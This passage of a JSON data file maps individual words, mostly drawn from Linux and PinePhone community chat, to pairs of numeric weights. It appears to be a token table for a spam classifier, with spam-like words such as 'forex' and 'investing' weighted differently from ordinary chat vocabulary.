"mhz": [65535, 0], "eb": [20045, 45490], "brute": [65535, 0], "stadium": [65535, 0], "football": [65535, 0], "ouch": [65535, 0], "shame": [65535, 0], "termux": [65535, 0], "\u0296": [65535, 0], "pgwipeout": [65535, 0], "modprobe": [65535, 0], "motorcomm": [65535, 0], "yt": [65535, 0], "phy": [65535, 0], "aiui": [65535, 0], "iftop": [65535, 0], "reproduceable": [65535, 0], "steps": [65535, 0], "tyty": [65535, 0], "differences": [65535, 0], "zooom": [65535, 0], "await": [65535, 0], "fs": [41813, 23722], "fout": [65535, 0], "'test": [65535, 0], "txt'": [65535, 0], "goo": [65535, 0], "cnujjx": [65535, 0], "pzm": [65535, 0], "ofl": [65535, 0], "writestring": [65535, 0], "str": [65535, 0], "fmt": [65535, 0], "println": [65535, 0], "fi": [65535, 0], "isdir": [65535, 0], "raspbian": [65535, 0], "bitrate": [65535, 0], "codec": [65535, 0], "unrelated": [65535, 0], "xfce": [65535, 0], "crashing": [65535, 0], "immediately": [30700, 34835], "rebuild": [65535, 0], "mateix": [65535, 0], "void": [65535, 0], "mount": [65535, 0], "int": [65535, 0], "lfs": [65535, 0], "lfsconfig": [65535, 0], "introduces": [65535, 0], "comma": [65535, 0], "chatty": [65535, 0], "git": [65535, 0], "governor": [65535, 0], "simpleondemand": [65535, 0], "counterpillow": [65535, 0], "explaining": [65535, 0], "maintainers": [65535, 0], "jmcwhatever": [65535, 0], "whataintinside": [65535, 0], "character": [65535, 0], "sadge": [65535, 0], "shiz": [65535, 0], "glmark": [65535, 0], "aw": [65535, 0], "contribute": [65535, 0], "birthday": [65535, 0], "fixes": [65535, 0], "transferred": [65535, 0], "spdif": [65535, 0], "seq": [65535, 0], "dummy": [65535, 0], "nft": [65535, 0], "fib": [65535, 0], "inet": [65535, 0], "ipv": [65535, 0], "reject": [65535, 0], "nf": [41813, 23722], "ct": [65535, 0], "iptable": [65535, 0], "nat": [65535, 0], "conntrack": [65535, 0], "defrag": [65535, 0], "mangle": [65535, 0], "raw": [65535, 0], "nfnetlink": [65535, 0], "tables": [65535, 0], "sry": [65535, 0], "trace": [65535, 0], "uw": [8393, 57142], "ee": [20045, 45490], "alrey": [8393, 57142], "exchange": [14152, 51383], "testimony": [3421, 62114], "helping": [12888, 52647], "individuals": [11832, 53703], "investing": [3171, 62364], "decided": [6891, 58644], "became": [20045, 45490], "dream": [14152, 51383], "income": [65535, 0], "ellen": [20045, 45490], "nod": [65535, 0], "jak": [65535, 0], "amen": [65535, 0], "pardon": [65535, 0], "asfdasgsjkd": [65535, 0], "mask": [65535, 0], "talsk": [65535, 0], "openocd": [65535, 0], "steal": [65535, 0], "pockets": [65535, 0], "passwords": [65535, 0], "onirc": [65535, 0], "alreadyg": [65535, 0], "zetabata": [65535, 0], "aactually": [65535, 0], "rtos": [65535, 0], "unto": [65535, 0], "excellent": [65535, 0], "linus": [65535, 0], "whose": [65535, 0], "sp": [65535, 0], "busy": [65535, 0], "keyborrrr": [65535, 0], "yeppp": [65535, 0], "nicee": [65535, 0], "leo": [65535, 0], "doge": [65535, 0], "pinepoint": [65535, 0], "qrt": [65535, 0], "moonbounce": [65535, 0], "tm": [65535, 0], "ooo": [65535, 0], "crucial": [65535, 0], "asus": [65535, 0], "cmake": [65535, 0], "dowhat": [65535, 0], "devbrick": [65535, 0], "forex": [5055, 60480], "ubuntuusers": [65535, 0], "webdav": [65535, 0], "bangles": [65535, 0], "multiarch": [65535, 0], "classic": [65535, 0], "unmerge": [65535, 0], "ho": [8393, 57142], "ware": [65535, 0], "rise": [65535, 0], "shine": [65535, 0], "doctor": [65535, 0], "gentlier": [65535, 0], "ankle": [65535, 0], "nick": [65535, 0], "json": [65535, 0], "lxc": [65535, 0], "container": [65535, 0], "mir": [65535, 0], "ham": [65535, 0], "radio": [65535, 0], "operators": [65535, 0], "critique": [65535, 0], "fingers": [65535, 0], "crossed": [65535, 0], "waveshare": [65535, 0], "cm": [65535, 0], "htm": [65535, 0], "regarding": [65535, 0], "upower": [65535, 0], "rg": [65535, 0], "ripgrep": [65535, 0], "ansi": [65535, 0], "extcon": [65535, 0], "kyle": [14881, 50654], "carlos": [65535, 0], "comment": [65535, 0], "zh": [65535, 0], "tw": [65535, 0], "\u64ad\u653e\u96fb\u5f71\u548c\u6b4c\u66f2": [65535, 0], "tryexec": [65535, 0], "rmpv": [65535, 0], "cr": [20045, 45490], "time's": [65535, 0], "stingy": [65535, 0], "wiir": [65535, 0], "traverse": [65535, 0], "au": [65535, 0], "ls": [65535, 0], "commit": [65535, 0], "cdec": [65535, 0], "ebafcf": [65535, 0], "crowbar": [65535, 0], "noises": [65535, 0], "fusb": [65535, 0], "garfield": [65535, 0], "kart": [65535, 0], "tier": [65535, 0], "letter": [65535, 0], "corresponds": [65535, 0], "rpm": [65535, 0], "christ": [65535, 0], "library": [65535, 0], "functions": [65535, 0], "handlers": [65535, 0], "ub": [65535, 0], "particular": [65535, 0], "dynamic": [65535, 0], "allocation": [37311, 28224], "safe": [32259, 33276], "passthrough": [65535, 0], "distrustcc": [65535, 0], "unavoidable": [65535, 0], "dist": [65535, 0], "rust": [65535, 0], "boosted": [65535, 0], "delivered": [65535, 0], "redacted": [65535, 0], "regarded": [65535, 0], "hehehehe": [65535, 0], "yessir": [65535, 0], "ak": [20045, 45490], "hepcat": [65535, 0], "thaks": [65535, 0], "hacked": [65535, 0], "ttants": [65535, 0], "clocked": [65535, 0], "cg": [65535, 0], "hardkernel": [65535, 0], "smartpower": [65535, 0], "iii": [65535, 0], "distributors": [65535, 0], "manual": [65535, 0], "brrrrr": [65535, 0], "appear": [65535, 0], "glorious": [65535, 0], "tbps": [65535, 0], "nooo": [65535, 0], "gigabits": [65535, 0], "brain": [65535, 0], "isolation": [65535, 0], "barrier": [65535, 0], "treated": [65535, 0], "nervous": [20045, 45490], "uff": [65535, 0], "air": [65535, 0], "oi": [65535, 0], "french": [65535, 0], "mate": [65535, 0], "tag": [65535, 0], "kieran": [65535, 0], "font": [65535, 0], "leco": [65535, 0], "l'\u00e9tat": [65535, 0], "digits": [65535, 0], "earpiece": [65535, 0], "sttlink": [65535, 0], "arent": [65535, 0], "instructions": [65535, 0], "alex": [65535, 0], "bee": [65535, 0], "iommu": [65535, 0], "lolwut": [65535, 0], "ip": [37311, 28224], "ble": [65535, 0], "light": [65535, 0], "bulbs": [65535, 0], "requiring": [65535, 0], "dope": [65535, 0], "fooled": [65535, 0], "animations": [65535, 0], "autologin": [65535, 0], "customise": [65535, 0], "nm": [65535, 0], "tired": [65535, 0], "frankly": [65535, 0], "journals": [65535, 0], "mg": [65535, 0], "chemicals": [65535, 0], "thermally": [65535, 0], "conductive": [65535, 0], "adhesive": [65535, 0], "bl": [65535, 0], "convoluted": [65535, 0], "loudspeaker": [65535, 0], "lul": [65535, 0], "productive": [26080, 39455], "expecting": [65535, 0], "gg": [65535, 0], "dzsfut": [65535, 0], "disturb": [65535, 0], "perhaps": [65535, 0], "petterhs": [65535, 0], "imstruction": [65535, 0], "resolving": [65535, 0], "keyboards": [65535, 0], "lp": [65535, 0], "ku": [65535, 0], "ly": [2385, 63150], "cn": [65535, 0], "destination": [65535, 0], "origin": [65535, 0], "airline": [65535, 0], "reception": [65535, 0], "bootable": [65535, 0], "gobbleday": [65535, 0], "eveyerone": [65535, 0], "wqhcm": [65535, 0], "strike": [65535, 0], "balance": [65535, 0], "stay": [23869, 41666], "profitable": [11832, 53703], "ruins": [65535, 0], "veritasium": [65535, 0], "incredibly": [65535, 0], "informative": [65535, 0], "remain": [65535, 0], "viewable": [65535, 0], "trm": [65535, 0], "previous": [43565, 21970], "statements": [65535, 0], "drift": [65535, 0], "mania": [65535, 0], "chiclet": [65535, 0], "tempting": [65535, 0], "pelase": [65535, 0], "france": [65535, 0], "keyring": [65535, 0], "dense": [65535, 0], "gelid": [65535, 0], "solutions": [65535, 0], "gp": [65535, 0], "ultimate": [30700, 34835], "installation": [53414, 12121], "pkjtf": [65535, 0], "ref": [35905, 29630], "keywords": [65535, 0], "bsolutions": [65535, 0], "bgp": [65535, 0], "qid": [65535, 0], "qsid": [65535, 0], "sres": [65535, 0], "cb": [56923, 8612], "pl": [65535, 0], "aahl": [65535, 0], "qa": [65535, 0], "zn": [65535, 0], "bb": [65535, 0], "krbyb": [65535, 0], "yjywm": [65535, 0], "lbl": [65535, 0], "kwmdg": [65535, 0], "yndwzl": [65535, 0], "hgkr": [65535, 0], "hnps": [65535, 0], "vwbrv": [65535, 0], "krg": [65535, 0], "rvb": [65535, 0], "thanksgiving": [65535, 0], "wake": [65535, 0], "early": [65535, 0], "yoda": [65535, 0], "irt": [65535, 0], "glodroid": [65535, 0], "tjoaqciiaaw": [65535, 0], "manjaro's": [65535, 0], "notes": [65535, 0], "contract": [20045, 45490], "literallly": [65535, 0], "your's": [65535, 0], "parcel": [65535, 0], "forwarders": [65535, 0], "thin": [65535, 0], "iphones": [65535, 0], "batteries": [65535, 0], "examples": [65535, 0], "wendy's": [65535, 0], "switzerland": [65535, 0], "clf": [65535, 0], "thonkang": [65535, 0], "friday": [37311, 28224], "swore": [65535, 0], "ventured": [65535, 0], "town": [65535, 0], "black": [49491, 16044], "insulation": [65535, 0], "diy": [65535, 0], "napalm": [65535, 0], "bearing": [65535, 0], "element": [65535, 0], "hah": [65535, 0], "understandable": [65535, 0], "quad": [65535, 0], "jdmkyc": [65535, 0], "ttps": [65535, 0], "datastories": [20045, 45490], "shopify": [20045, 45490], "played": [65535, 0], "tennis": [65535, 0], "spend": [24254, 41281], "woot": [65535, 0], "lived": [65535, 0], "translitterate": [65535, 0], "electric": [65535, 0], "scooter": [65535, 0], "james": [65535, 0], "recognition": [65535, 0], "star": [65535, 0], "fame": [65535, 0], "outshine": [65535, 0], "predecessor": [65535, 0], "tp": [65535, 0], "xx": [65535, 0], "fzfizoeorzq": [65535, 0], "gather": [65535, 0], "greeter": [65535, 0], "bullshit": [65535, 0], "properly": [65535, 0], "genuinly": [65535, 0], "staying": [65535, 0], "argument": [65535, 0], "polystyrene": [65535, 0], "ca": [30700, 34835], "ful": [65535, 0], "oem": [65535, 0], "rootfs": [65535, 0], "userdata": [65535, 0], "immutable": [65535, 0], "mutable": [65535, 0], "blinking": [65535, 0], "tensioner": [65535, 0], "preview": [20045, 45490], "preboot": [65535, 0], "boring": [65535, 0], "okj": [65535, 0], "popular": [37311, 28224], "googoole": [65535, 0], "googoogle": [65535, 0], "accessing": [65535, 0], "anal": [65535, 0], "unix": [65535, 0], "lolz": [65535, 0], "fully": [57395, 8140], "gatekeeper": [65535, 0], "forwarder": [65535, 0], "pipewire": [65535, 0], "lile": [65535, 0], "culprits": [65535, 0], "meta": [65535, 0], "adobe": [65535, 0], "lmfao": [65535, 0], "opencamera": [65535, 0], "drawbuffer": [65535, 0], "nicolas": [65535, 0], "freetube": [65535, 0], "posh": [65535, 0], "apn": [65535, 0], "githubstatus": [65535, 0], "fingered": [65535, 0], "yesyes": [65535, 0], "webkit": [65535, 0], "perf": [65535, 0], "sunspider": [65535, 0], "cube": [65535, 0], "morph": [65535, 0], "raytrace": [65535, 0], "trees": [65535, 0], "fannkuch": [65535, 0], "nbody": [65535, 0], "protect": [65535, 0], "partners": [65535, 0], "downvote": [65535, 0], "reg": [65535, 0], "'b": [65535, 0], "reserved": [30700, 34835], "aye": [65535, 0], "zpool": [65535, 0], "zbud": [65535, 0], "zram": [65535, 0], "writeback": [65535, 0], "ncurses": [65535, 0], "hired": [65535, 0], "chris": [65535, 0], "friends": [30700, 34835], "charging": [65535, 0], "disabling": [65535, 0], "finfet": [65535, 0], "skills": [11832, 53703], "greek": [65535, 0], "flavour": [65535, 0], "beans": [65535, 0], "favorite": [65535, 0], "pasta": [65535, 0], "plain": [65535, 0], "penne": [65535, 0], "arabita": [65535, 0], "teach": [65535, 0], "lettuce": [65535, 0], "taa": [65535, 0], "snippet": [65535, 0], "matter": [65535, 0], "stlink": [65535, 0], "dies": [65535, 0], "seconds": [65535, 0], "stores": [65535, 0], "electr": [65535, 0], "lyte": [65535, 0], "weston": [65535, 0], "blestate": [65535, 0], "blecontroller": [65535, 0], "isconnected": [65535, 0], "notificationstate": [65535, 0], "notificatiomanager": [65535, 0], "arenewnotificationsavailable": [65535, 0], "strcat": [65535, 0], "notif": [65535, 0], "libdrm": [65535, 0], "pinebookpro": [65535, 0], "voltage": [65535, 0], "measurement": [65535, 0], "hardest": [65535, 0], "whoa": [65535, 0], "fyi": [65535, 0], "jesus": [65535, 0], "respectech": [65535, 0], "ameridroid's": [65535, 0], "parent": [65535, 0], "dust": [65535, 0], "sock": [65535, 0], "unavoiadable": [65535, 0], "benchmarking": [65535, 0], "freedom": [17602, 47933], "buttdown": [65535, 0], "rdp": [65535, 0], "hack": [65535, 0], "dang": [65535, 0], "wtg": [65535, 0], "brazil": [65535, 0], "uhhh": [65535, 0], "nifty": [65535, 0], "scaling": [65535, 0], "wheee": [65535, 0], "sunday": [65535, 0], "bottom": [65535, 0], "ohhhhh": [65535, 0], "sheets": [65535, 0], "scc": [65535, 0], "nukes": [65535, 0], "cash": [20045, 45490], "nsk": [65535, 0], "oplk": [65535, 0], "accurately": [65535, 0], "continuity": [65535, 0], "shorting": [65535, 0], "hoo": [65535, 0], "annoys": [65535, 0], "fet": [65535, 0], "australia": [20045, 45490], "boat": [65535, 0], "sehr": [65535, 0], "geehrter": [65535, 0], "kunde": [65535, 0], "vielen": [65535, 0], "f\u00fcr": [20045, 45490], "ihre": [20045, 45490], "bestellung": [65535, 0], "reichelt": [65535, 0], "elektronik": [65535, 0], "drawing": [65535, 0], "acer": [65535, 0], "swift": [65535, 0], "sf": [65535, 0], "megabyte": [65535, 0], "blobs": [65535, 0], "timeout": [65535, 0], "devicetreedir": [65535, 0], "dtbs": [65535, 0], "ayufdan": [65535, 0], "ayufan": [65535, 0], "among": [11832, 53703], "others": [28988, 36547], "autohell": [65535, 0], "mediatek": [65535, 0], "comparison": [65535, 0], "searching": [65535, 0], "husband": [65535, 0], "sister": [65535, 0], "motorway": [65535, 0], "km": [65535, 0], "collegues": [65535, 0], "eur": [65535, 0], "gee": [65535, 0], "bill": [30700, 34835], "mom": [65535, 0], "lets": [39757, 25778], "pinephones": [65535, 0], "lucasz": [65535, 0], "erecinski": [65535, 0], "created": [65535, 0], "xfwm": [65535, 0], "jm": [65535, 0], "managers": [20045, 45490], "apt": [65535, 0], "moo": [65535, 0], "kubuntu": [65535, 0], "reality": [65535, 0], "gpp": [65535, 0], "idle": [65535, 0], "inflation": [65535, 0], "hd": [65535, 0], "xs": [65535, 0], "psc": [65535, 0], "ppx": [65535, 0], "pop": [65535, 0], "mob": [65535, 0], "asin": [65535, 0], "logged": [65535, 0], "kde": [65535, 0], "nao": [65535, 0], "hmsemi": [65535, 0], "downfile": [65535, 0], "sot": [65535, 0], "seemingly": [65535, 0], "ecns": [65535, 0], "passeggeri": [65535, 0], "operates": [65535, 0], "trains": [65535, 0], "workplace": [65535, 0], "essential": [11832, 53703], "exception": [65535, 0], "surprise": [17081, 48454], "afaict": [65535, 0], "labels": [65535, 0], "ruining": [65535, 0], "semi": [65535, 0], "jokingly": [65535, 0], "paulfertser": [65535, 0], "tuxedo": [65535, 0], "co": [51725, 13810], "entry": [65535, 0], "discharged": [65535, 0], "batteryto": [65535, 0], "pwer": [65535, 0], "gnd": [65535, 0], "ayo": [65535, 0], "desttinghim": [65535, 0], "ofc": [65535, 0], "force": [65535, 0], "vendors": [65535, 0], "rendering": [65535, 0], "foresee": [65535, 0], "perform": [65535, 0], "dt": [65535, 0], "multiply": [65535, 0], "xt": [30700, 34835], "none": [65535, 0], "effectivity": [65535, 0], "gpd": [65535, 0], "micro": [65535, 0], "zipit": [65535, 0], "uarts": [65535, 0], "zaphod": [65535, 0], "itctl": [65535, 0], "batt": [65535, 0], "doglmewaaaam": [65535, 0], "office": [30700, 34835], "michael": [26080, 39455], "scott": [3881, 61654], "wl": [65535, 0], "printed": [65535, 0], "abs": [65535, 0], "tpu": [65535, 0], "exoskeleton": [65535, 0], "jlcpcb": [65535, 0], "offers": [34352, 31183], "grim": [65535, 0], "requirement": [65535, 0], "ttl": [65535, 0], "baud": [65535, 0], "spacepub": [65535, 0], "martijnbraam": [65535, 0], "switching": [65535, 0], "avoid": [65535, 0], "copying": [37311, 28224], "blank": [65535, 0], "freaking": [65535, 0], "asterisk": [65535, 0], "entertaining": [65535, 0], "splat": [65535, 0], "overstatement": [65535, 0], "pineville": [65535, 0], "la": [9051, 56484], "cheese": [65535, 0], "bacon": [65535, 0], "vconn": [65535, 0], "spent": [65535, 0], "presents": [65535, 0], "lightdm": [65535, 0], "danctnix": [65535, 0], "success": [30700, 34835], "dipping": [65535, 0], "tip": [65535, 0], "flux": [65535, 0], "tin": [65535, 0], "damp": [65535, 0], "cellulose": [65535, 0], "sponge": [65535, 0], "cotton": [65535, 0], "rag": [65535, 0], "terrible": [65535, 0], "workarounds": [65535, 0], "nic's": [65535, 0], "aim": [65535, 0], "messenger": [65535, 0], "shutdown": [65535, 0], "gain": [11832, 53703], "stattusbar": [65535, 0], "danger": [11832, 53703], "misconfiguring": [65535, 0], "regulators": [65535, 0], "welder": [65535, 0], "whey": [65535, 0], "alsamixer": [65535, 0], "lx": [11832, 53703], "bugzilla": [65535, 0], "redhat": [65535, 0], "cgi": [65535, 0], "dhl": [55795, 9740], "feels": [56923, 8612], "frisky": [65535, 0], "\u0445\u043e\u0440\u043e\u0448\u043e": [65535, 0], "\u043f\u043e\u043f\u0440\u043e\u0431\u0443\u044e": [65535, 0], "\u0442\u0443\u0434\u0430": [65535, 0], "\u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c": [65535, 0], "peter": [65535, 0], "scrolling": [65535, 0], "smooth": [65535, 0], "hax": [65535, 0], "ameridroid": [65535, 0], "pays": [11832, 53703], "papercuts": [65535, 0], "recall": [65535, 0], "lightmodehelmets": [65535, 0], "tobi": [65535, 0], "lutke": [65535, 0], "aoc": [65535, 0], "unreasonable": [65535, 0], "wild": [65535, 0], "guesses": [65535, 0], "stress": [17967, 47568], "scenarios": [65535, 0], "heatsink": [65535, 0], "model": [65535, 0], "stage": [37311, 28224], "lto": [65535, 0], "forums": [65535, 0], "quectel": [65535, 0], "eg": [65535, 0], "esim": [65535, 0], "profiles": [20045, 45490], "shenzhen": [65535, 0], "melbourne": [65535, 0], "workaround": [65535, 0], "alternatively": [65535, 0], "named": [65535, 0], "spagett": [65535, 0], "bologna": [65535, 0], "sauce": [65535, 0], "fettuccine": [65535, 0], "cleverbot": [65535, 0], "clever": [65535, 0], "hermes": [65535, 0], "dpd": [65535, 0], "et": [30700, 34835], "al": [16279, 49256], "clusterfuck": [65535, 0], "sysnonymous": [65535, 0], "price": [65535, 0], "gouging": [65535, 0], "retro": [65535, 0], "center": [65535, 0], "maintainer": [65535, 0], "maintains": [65535, 0], "backwards": [65535, 0], "compatibility": [65535, 0], "relinquish": [65535, 0], "translating": [65535, 0], "gpe": [65535, 0], "ereader": [65535, 0], "sn": [65535, 0], "prusa": [65535, 0], "shave": [65535, 0], "meters": [65535, 0], "amazed": [20045, 45490], "cnc": [65535, 0], "routers": [65535, 0], "elliot": [8393, 57142], "hackaday": [65535, 0], "attended": [65535, 0], "stole": [65535, 0], "proably": [65535, 0], "maintain": [65535, 0], "automated": [10733, 54802], "optimized": [65535, 0], "capital": [2419, 63116], "harold": [65535, 0], "holt": [65535, 0], "pm'd": [65535, 0], "ignored": [65535, 0], "spring": [65535, 0], "onions": [65535, 0], "crowded": [65535, 0], "easter": [65535, 0], "egg": [65535, 0], "colors": [65535, 0], "nimble": [65535, 0], "thikn": [65535, 0], "delegates": [65535, 0], "freertos": [65535, 0], "thereafter": [65535, 0], "secured": [20045, 45490], "paperwork": [65535, 0], "ddg": [65535, 0], "'e": [65535, 0], "spec'": [65535, 0], "pdfs": [65535, 0], "ambulance": [65535, 0], "nq": [65535, 0], "prevent": [65535, 0], "experiencing": [65535, 0], "vibrations": [65535, 0], "epoxied": [65535, 0], "earn": [388, 65147], "revenue": [65535, 0], "records": [65535, 0], "maxlinear": [65535, 0], "satellite": [65535, 0], "andamp": [65535, 0], "terrestrial": [65535, 0], "fsc": [65535, 0], "narrowband": [65535, 0], "tuners": [65535, 0], "demods": [65535, 0], "mxl": [65535, 0], "sdk": [65535, 0], "compiles": [65535, 0], "greeat": [65535, 0], "vop": [65535, 0], "vpu": [65535, 0], "dorian": [65535, 0], "verzollungsvollmacht": [65535, 0], "euro": [65535, 0], "handling": [65535, 0], "fee": [11832, 53703], "installer": [65535, 0], "disk": [65535, 0], "encryption": [65535, 0], "instance": [54327, 11208], "concerning": [65535, 0], "arthritis": [65535, 0], "printing": [65535, 0], "commands": [65535, 0], "objects": [65535, 0], "axolotl": [65535, 0], "karen": [65535, 0], "motherboard": [65535, 0], "brings": [30700, 34835], "lease": [65535, 0], "thinkpads": [65535, 0], "games": [65535, 0], "addictive": [65535, 0], "fets": [65535, 0], "shorts": [65535, 0], "visually": [65535, 0], "inspected": [65535, 0], "internals": [65535, 0], "anyplace": [65535, 0], "dead": [65535, 0], "asian": [65535, 0], "brands": [65535, 0], "\u4ec0\u4e48\u4e1c\u4e1c": [65535, 0], "shitty": [65535, 0], "handy": [65535, 0], "kiss": [65535, 0], "sparks": [65535, 0], "flying": [65535, 0], "fees": [20045, 45490], "belgium": [65535, 0], "confused": [45076, 20459], "aria": [65535, 0], "player": [65535, 0], "unboxing": [65535, 0], "impressions": [65535, 0], "vid": [65535, 0], "refuse": [65535, 0], "judged": [65535, 0], "portablepowersupplies": [65535, 0], "blocker": [65535, 0], "sentiment": [65535, 0], "mutual": [65535, 0], "dai": [65535, 0], "mrfixit": [65535, 0], "tux": [65535, 0], "blegh": [65535, 0], "userspace": [65535, 0], "quickly": [65535, 0], "purism": [65535, 0], "supreme": [65535, 0], "court": [20045, 45490], "rkfwf": [65535, 0], "fvbf": [65535, 0], "togwno": [65535, 0], "array": [65535, 0], "pictures": [65535, 0], "brixit": [65535, 0], "album": [37311, 28224], "bd": [65535, 0], "ead": [11832, 53703], "cdc": [65535, 0], "cbfd": [65535, 0], "ccd": [65535, 0], "truemmerer": [65535, 0], "animated": [65535, 0], "wallpaper": [65535, 0], "drunk": [65535, 0], "ach": [65535, 0], "ist": [65535, 0], "hier": [65535, 0], "penny": [65535, 0], "awake": [65535, 0], "fw": [65535, 0], "reflash": [65535, 0], "messing": [65535, 0], "uhs": [65535, 0], "inform": [8393, 57142], "ensure": [65535, 0], "urselg": [65535, 0], "burn": [65535, 0], "implementations": [65535, 0], "playing": [65535, 0], "piano": [65535, 0], "colored": [65535, 0], "sharpies": [65535, 0], "earthquake": [65535, 0], "jackson": [65535, 0], "oob": [65535, 0], "relatives": [65535, 0], "emojies": [65535, 0], "grinning": [65535, 0], "emoji": [65535, 0], "parents": [65535, 0], "brother": [37311, 28224], "lunch": [65535, 0], "brakes": [65535, 0], "eight": [65535, 0], "totalwireless": [65535, 0], "hotspot": [65535, 0], "replaced": [65535, 0], "rj": [65535, 0], "nowadays": [65535, 0], "birother": [65535, 0], "preparing": [65535, 0], "'piraskja'": [65535, 0], "crash": [65535, 0], "mtx": [65535, 0], "hhd": [65535, 0], "latops": [65535, 0], "tweakers": [65535, 0], "tinkerz": [65535, 0], "documentation": [65535, 0], "pstore": [65535, 0], "blk": [65535, 0], "rst": [65535, 0], "xuqbb": [65535, 0], "fioq": [65535, 0], "wideband": [65535, 0], "receivers": [65535, 0], "automatic": [9294, 56241], "infringe": [65535, 0], "rights": [37311, 28224], "choices": [65535, 0], "record": [65535, 0], "desk": [65535, 0], "accumulates": [65535, 0], "rga": [65535, 0], "convert": [65535, 0], "rgb": [65535, 0], "yuv": [65535, 0], "grayscale": [65535, 0], "gead": [65535, 0], "chichengzao": [65535, 0], "aug": [65535, 0], "notlillie": [65535, 0], "androidcentral": [65535, 0], "chargers": [65535, 0], "almighty": [65535, 0], "narcotics": [65535, 0], "wife": [65535, 0], "girls": [65535, 0], "flee": [65535, 0], "suck": [65535, 0], "exact": [20045, 45490], "microsoft": [65535, 0], "devil": [65535, 0], "sperber": [65535, 0], "beer": [65535, 0], "ungive": [65535, 0], "rudstbsapde": [65535, 0], "wanna": [13704, 51831], "unique": [20045, 45490], "iso": [65535, 0], "spotifygr": [65535, 0], "tj": [65535, 0], "aomb": [65535, 0], "hrcbcw": [65535, 0], "dw": [65535, 0], "addicted": [65535, 0], "spending": [30700, 34835], "discontinued": [65535, 0], "survey": [65535, 0], "foss": [65535, 0], "enthusiast": [65535, 0], "ju": [65535, 0], "loosely": [65535, 0], "interpret": [65535, 0], "categories": [65535, 0], "explains": [65535, 0], "further": [45076, 20459], "stackexchange": [65535, 0], "tap": [65535, 0], "verified": [16279, 49256], "mayabe": [65535, 0], "aus": [65535, 0], "creepy": [65535, 0], "fancy": [65535, 0], "communicat": [65535, 0], "devic": [65535, 0], "laptops": [65535, 0], "moved": [49491, 16044], "hunting": [65535, 0], "laser": [65535, 0], "pointer": [65535, 0], "stand": [40828, 24707], "doors": [65535, 0], "eaisely": [65535, 0], "builded": [65535, 0], "visual": [65535, 0], "studio": [65535, 0], "pinesil": [65535, 0], "hands": [65535, 0], "litium": [65535, 0], "accu": [65535, 0], "kpjsw": [65535, 0], "posting": [45076, 20459], "tries": [65535, 0], "provides": [65535, 0], "functionality": [65535, 0], "chance": [24599, 40936], "modding": [65535, 0], "ender": [65535, 0], "march": [65535, 0], "gchat": [65535, 0], "appletalk": [65535, 0], "virt": [65535, 0], "gic": [65535, 0], "earned": [6503, 59032], "offset": [65535, 0], "sirjofri": [65535, 0], "secret": [65535, 0], "cut": [65535, 0], "fold": [65535, 0], "contacts": [65535, 0], "sheet": [65535, 0], "copper": [65535, 0], "tiktok": [65535, 0], "thepeoplesguitarist": [65535, 0], "oe": [9294, 56241], "gjnfqiw": [65535, 0], "ey": [20045, 45490], "efficiency": [65535, 0], "cernodile": [65535, 0], "awesomeness": [65535, 0], "house": [37311, 28224], "behaviour": [65535, 0], "attempting": [65535, 0], "dreamed": [65535, 0], "worldwide": [20045, 45490], "wall": [65535, 0], "xkcd": [65535, 0], "decommisions": [65535, 0], "usul": [65535, 0], "twist": [65535, 0], "kiil": [65535, 0], "fuckers": [65535, 0], "choose": [30700, 34835], "polarity": [65535, 0], "problems": [34352, 31183], "electronics": [65535, 0], "damaging": [65535, 0], "department": [20045, 45490], "defense": [65535, 0], "therapy": [65535, 0], "deep": [49491, 16044], "picture": [65535, 0], "demonstrates": [65535, 0], "foresight": [65535, 0], "elec": [65535, 0], "engi": [65535, 0], "netwrok": [65535, 0], "devoloper": [65535, 0], "smaeul": [65535, 0], "isps": [65535, 0], "sims": [65535, 0], "jetbrains": [65535, 0], "fleet": [65535, 0], "architecture": [65535, 0], "changes": [14881, 50654], "processes": [65535, 0], "former": [65535, 0], "latter": [65535, 0], "creates": [65535, 0], "views": [65535, 0], "generate": [47550, 17985], "gen": [65535, 0], "customers": [65535, 0], "walmart": [65535, 0], "galaxy": [65535, 0], "orbit": [65535, 0], "commitment": [65535, 0], "robot": [65535, 0], "spammer": [30700, 34835], "begineers": [65535, 0], "fixing": [65535, 0], "practices": [65535, 0], "scummy": [65535, 0], "tesla": [20045, 45490], "presumably": [65535, 0], "deficit": [65535, 0], "trillions": [65535, 0], "dollars": [30700, 34835], "ytou": [65535, 0], "oscilloscope": [65535, 0], "picocom": [65535, 0], "legs": [65535, 0], "thick": [65535, 0], "bend": [65535, 0], "position": [65535, 0], "tension": [65535, 0], "ralimtek": [65535, 0], "bf": [65535, 0], "hacky": [65535, 0], "waste": [65535, 0], "energy": [65535, 0], "marxism": [65535, 0], "babyyyy": [65535, 0], "gigabit": [65535, 0], "fttp": [65535, 0], "hunter": [65535, 0], "gatherer": [65535, 0], "societies": [65535, 0], "trial": [5308, 60227], "nitro": [5002, 60533], "irresponsible": [65535, 0], "adult": [65535, 0], "usbip": [65535, 0], "oddity": [65535, 0], "nixos": [65535, 0], "acid": [65535, 0], "zone": [65535, 0], "clapper": [65535, 0], "dcb": [65535, 0], "kdcb": [65535, 0], "synths": [65535, 0], "snnkv": [65535, 0], "theme": [65535, 0], "macos": [65535, 0], "messy": [65535, 0], "dmcefjzdofs": [65535, 0], "vdd": [65535, 0], "mv": [65535, 0], "inconsistent": [65535, 0], "drag": [65535, 0], "graveshift": [65535, 0], "attention": [37311, 28224], "references": [65535, 0], "refdiv": [65535, 0], "fbdiv": [65535, 0], "postdiv": [65535, 0], "foutpostdiv": [65535, 0], "foutvco": [65535, 0], "fref": [20045, 45490], "frac": [65535, 0], "patchset": [65535, 0], "shelved": [65535, 0], "parameters": [65535, 0], "lvglv": [65535, 0], "scratch": [65535, 0], "hyptnotoad": [65535, 0], "zhu": [65535, 0], "rlscdxu": [65535, 0], "rattly": [65535, 0], "tk": [65535, 0], "pmszy": [65535, 0], "bafyyamzbni": [65535, 0], "inserted": [65535, 0], "unban": [65535, 0], "pimbuk": [65535, 0], "delock": [65535, 0], "tl": [20045, 45490], "corporations": [65535, 0], "obscure": [65535, 0], "events": [65535, 0], "grub": [65535, 0], "fedora": [65535, 0], "pleasant": [65535, 0], "smth": [65535, 0], "struggling": [65535, 0], "snes": [65535, 0], "something's": [65535, 0], "frightening": [65535, 0], "superhuman": [65535, 0], "eyes": [33223, 32312], "vinny": [65535, 0], "falling": [65535, 0], "lsusb": [65535, 0], "vt": [65535, 0], "autohotkey": [65535, 0], "gog": [65535, 0], "planet": [65535, 0], "wonderful": [30700, 34835], "quiet": [65535, 0], "hum": [65535, 0], "symbols": [65535, 0], "earth": [30700, 34835], "completely": [49491, 16044], "human": [65535, 0], "interaction": 